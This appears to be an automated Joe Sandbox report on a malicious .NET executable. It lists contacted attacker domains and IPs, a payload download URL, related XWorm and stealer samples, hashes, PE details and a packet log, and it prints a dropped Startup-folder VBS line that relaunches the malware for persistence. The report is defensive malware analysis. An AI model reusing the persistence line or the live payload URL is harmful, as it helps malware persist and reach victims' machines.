bin14.ydns.eu	0%	Avira URL Cloud	safe
bin12.ydns.eu	0%	Avira URL Cloud	safe
http://win32.ydns.eu/never/lookinto/it/panel/uploads/Qwprueqkjqe.mp3	0%	Avira URL Cloud	safe
smfcs3.ydns.eu	0%	Avira URL Cloud	safe
smfcs1.ydns.eu	0%	Avira URL Cloud	safe
kingsbkup1.ydns.eu	0%	Avira URL Cloud	safe
http://win32.ydns.eu	0%	Avira URL Cloud	safe
http://win32.ydns.eu/never/lookinto/it/panel/uploads/Qwprueqkjqe.mp312c051VsJF24a5QJoEmnRyw==	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
win32.ydns.eu	45.144.214.104	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
smfcs3.ydns.eu	true	Avira URL Cloud: safe	unknown
kingsbkup1.ydns.eu	true	Avira URL Cloud: safe	unknown
bin14.ydns.eu	true	Avira URL Cloud: safe	unknown
http://win32.ydns.eu/never/lookinto/it/panel/uploads/Qwprueqkjqe.mp3	false	Avira URL Cloud: safe	unknown
bin12.ydns.eu	true	Avira URL Cloud: safe	unknown
smfcs1.ydns.eu	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://github.com/mgravell/protobuf-neti	pictures and specifications.exe, 00000000.00000002.1811855695.0000000005C90000.00000004.08000000.00040000.00000000.sdmp	false		high
https://stackoverflow.com/q/14436606/23354	pictures and specifications.exe, 00000000.00000002.1798222881.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, pictures and specifications.exe, 00000000.00000002.1811855695.0000000005C90000.00000004.08000000.00040000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-netJ	pictures and specifications.exe, 00000000.00000002.1811855695.0000000005C90000.00000004.08000000.00040000.00000000.sdmp	false		high
https://stackoverflow.com/q/11564914/23354;	pictures and specifications.exe, 00000000.00000002.1811855695.0000000005C90000.00000004.08000000.00040000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	pictures and specifications.exe, 00000000.00000002.1811855695.0000000005C90000.00000004.08000000.00040000.00000000.sdmp	false		high
http://win32.ydns.eu	pictures and specifications.exe, 00000000.00000002.1798222881.0000000002821000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/mgravell/protobuf-net	pictures and specifications.exe, 00000000.00000002.1811855695.0000000005C90000.00000004.08000000.00040000.00000000.sdmp	false		high
http://win32.ydns.eu/never/lookinto/it/panel/uploads/Qwprueqkjqe.mp312c051VsJF24a5QJoEmnRyw==	pictures and specifications.exe, IsPrimitive.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	pictures and specifications.exe, 00000000.00000002.1798222881.0000000002821000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.144.214.104	win32.ydns.eu	Ukraine		47169	HPC-MVM-ASHU	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1629960
Start date and time:	2025-03-05 10:51:15 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	pictures and specifications.exe
Detection:	MAL
Classification:	mal100.troj.expl.evad.winEXE@4/3@1/1
EGA Information:	Failed
HCA Information:	Successful, ratio: 84% Number of executed functions: 60 Number of non-executed functions: 6
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.60
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target pictures and specifications.exe, PID 7300 because it is empty
Execution Graph export aborted for target pictures and specifications.exe, PID 7476 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
09:52:19	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsPrimitive.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
45.144.214.104	Bestellbest#U00e4tigung.exe	Get hash	malicious	XWorm	Browse	win32.ydns.eu/never/lookinto/it/panel/uploads/Rieukcp.pdf
	FFDOC-2025210 pdf.exe	Get hash	malicious	XWorm	Browse	win32.ydns.eu/never/lookinto/it/panel/uploads/Ptcugze.mp3
	UPS tracking details.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse	win32.ydns.eu/never/lookinto/it/panel/uploads/Fjuzaw.pdf
	Enquiry#039855.exe	Get hash	malicious	XWorm	Browse	win32.ydns.eu/never/lookinto/it/panel/uploads/Tnemxaef.vdf

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
win32.ydns.eu	Bestellbest#U00e4tigung.exe	Get hash	malicious	XWorm	Browse	45.144.214.104
	FFDOC-2025210 pdf.exe	Get hash	malicious	XWorm	Browse	45.144.214.104
	UPS tracking details.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse	45.144.214.104
	Enquiry#039855.exe	Get hash	malicious	XWorm	Browse	45.144.214.104

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HPC-MVM-ASHU	Bestellbest#U00e4tigung.exe	Get hash	malicious	XWorm	Browse	45.144.214.104
	FFDOC-2025210 pdf.exe	Get hash	malicious	XWorm	Browse	45.144.214.104
	nklarm.elf	Get hash	malicious	Unknown	Browse	45.131.150.251
	UPS tracking details.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse	45.144.214.104
	1ZXaFij.exe	Get hash	malicious	Xmrig	Browse	45.144.212.77
	Enquiry#039855.exe	Get hash	malicious	XWorm	Browse	45.144.214.104
	Auftragsbest#U00e4tigung.exe	Get hash	malicious	Quasar	Browse	45.144.214.107
	IRSTaxRefund.exe	Get hash	malicious	DBatLoader, Remcos	Browse	45.144.214.126
	SCS AWB and Commercial Invoice.exe	Get hash	malicious	Snake Keylogger, XWorm	Browse	45.144.214.104
	PaRWfF3x5K.elf	Get hash	malicious	Unknown	Browse	45.131.150.253

Process:	C:\Users\user\Desktop\pictures and specifications.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	181248
Entropy (8bit):	5.247906004267092
Encrypted:	false
SSDEEP:	3072:5rsawEN2scoJ7FWN3WfHC5kan0r0i4tyAyptWKye6vx2PvLn3:5H7FLf4kan0rBP
MD5:	CE901F91244366477CD0B769D92F9034
SHA1:	6F49860E768725F78BF3855D18EFE329B3553355
SHA-256:	1B72E6203B4D26CBE44B55E7DF27B3477BADD3270CF900BB13C2AF47BED80516
SHA-512:	2F94FBD0D733DB31C5AD56BE18EE53EC6A531A7D7F5BC08F59C1C7F3DD0F5827B9E4DD586B084AC031FD06599510332D21EBBB7515A1441332D1FC11B143BDFB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 37%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..g................................. ........@.. ....................... ............`.................................@...K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H.......P...................................................................(......0.......... ........8........E....9...,.......f...84......}.... ....~....{....9....& ....8......\|....(......\|......(...+ ....~....{....9....& ....8......(....}.... ....8o.....0..{....... ........8........E....W.......+...8R.....(.... ....~....{....9....& ....8.....(....o...... ....~....{....9....& ....8.....&~..........~......0..7.........(....}.......}.......}......\|......(...+..\|....(..

C:\Users\user\AppData\Roaming\IsPrimitive.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\pictures and specifications.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsPrimitive.vbs

Download File

Process:	C:\Users\user\Desktop\pictures and specifications.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	86
Entropy (8bit):	4.779486743739521
Encrypted:	false
SSDEEP:	3:FER/n0eFHHot+kiEaKC5iLtHn:FER/lFHIwknaZ5o1
MD5:	F548ECE7E4F7318DAFB2B4CE33A1D02D
SHA1:	C7A70DC89358C19A94EE4246AE38ACDA0C772280
SHA-256:	1B814AD314E9FC9949CB8E6656ECF4F1456878E02E01DAA13BFF7815FAACCC2B
SHA-512:	21232D9A48C8E3E3D1CF5BB789B21A89362380BE73BCCCB18101C8155BA29AC3370AB284DE9B11C52FE0E9DE697630FCD5E59FD511681184EBF5AAB9E3684F17
Malicious:	true
Reputation:	low
Preview:	CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\IsPrimitive.exe"""

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.247906004267092
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	pictures and specifications.exe
File size:	181'248 bytes
MD5:	ce901f91244366477cd0b769d92f9034
SHA1:	6f49860e768725f78bf3855d18efe329b3553355
SHA256:	1b72e6203b4d26cbe44b55e7df27b3477badd3270cf900bb13c2af47bed80516
SHA512:	2f94fbd0d733db31c5ad56be18ee53ec6a531a7d7f5bc08f59c1c7f3dd0f5827b9e4dd586b084ac031fd06599510332d21ebbb7515a1441332d1fc11b143bdfb
SSDEEP:	3072:5rsawEN2scoJ7FWN3WfHC5kan0r0i4tyAyptWKye6vx2PvLn3:5H7FLf4kan0rBP
TLSH:	E8047517B6BA85B1F2E46B77C8AB050047B4F581E66BC71F7D8A135A0D437AA98C130F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..g................................. ........@.. ....................... ............`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x42d88e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67C7D940 [Wed Mar 5 04:55:28 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2d840	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2e000	0x598	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x30000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x2b894	0x2ba00	ba3f1cbf6310c4e67f438c38ebc5c052	False	0.3953371239255014	data	5.2661570954824715	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x2e000	0x598	0x600	84e05485fb1c0ced89386a39790925eb	False	0.4166666666666667	data	4.090593215194031	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x30000	0xc	0x200	1b861d6a05069368632a4e8fa209beb6	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x2e0a0	0x30c	data			0.4269230769230769
RT_MANIFEST	0x2e3ac	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
Comments
CompanyName
FileDescription	DOGGY12
FileVersion	1.0.0.0
InternalName	DOGGY12.exe
LegalCopyright	Copyright 2015
LegalTrademarks
OriginalFilename	DOGGY12.exe
ProductName	DOGGY12
ProductVersion	1.0.0.0
Assembly Version	1.0.0.0

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 5, 2025 10:52:06.838948011 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:06.843987942 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:06.844055891 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:06.844861031 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:06.849833012 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.576247931 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.576340914 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.576402903 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.576422930 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.576469898 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.576504946 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.576538086 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.576572895 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.576616049 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.576632023 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.576632023 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.576661110 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.576694012 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.576729059 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.576772928 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.581933975 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.581970930 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.582036972 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.707179070 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.707223892 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.707259893 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.707298994 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.707344055 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.707380056 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.707530975 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.707566977 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.707600117 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.707623005 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.707660913 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.707695007 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.707715988 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.707748890 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.707804918 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.708364010 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.708399057 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.708447933 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.708462954 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.708767891 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.708801031 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.708826065 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.708863974 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.708905935 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.708924055 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.708957911 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.709007978 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.709520102 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.709573030 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.709605932 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.709629059 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.709665060 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.709717035 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.712496996 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.755336046 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.838041067 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.838087082 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.838144064 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.838179111 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.838212013 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.838253021 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.838289976 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.838290930 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.838329077 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.838370085 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.838459969 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.838494062 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.838516951 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.838555098 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.838588953 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.838613987 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.838645935 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.838696003 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.839093924 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.839145899 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.839191914 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.839205980 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.839241028 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.839287043 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.839299917 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.839333057 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.839375019 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.839389086 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.840074062 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.840106964 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.840128899 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.840164900 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.840208054 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.840221882 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.840255976 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.840298891 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.840332031 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.840368032 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.840415001 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.840714931 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.840852022 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.840888023 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.840910912 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.840948105 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.840995073 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.841007948 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.880548954 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.968969107 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.969059944 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.969099998 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.969155073 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.969183922 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.969202042 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.969218969 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.969239950 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.969239950 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.969239950 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.969280958 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.969295979 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.969319105 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.969330072 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.969345093 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.969367981 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.969377041 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.969393015 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.969407082 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.969414949 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.969422102 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.969434023 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.969800949 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.969815016 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.969825029 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.969835997 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.969841957 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.969851971 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.969858885 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.969885111 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.969907999 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.969917059 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.969928026 CET	80	49730	45.144.214.104	192.168.2.4
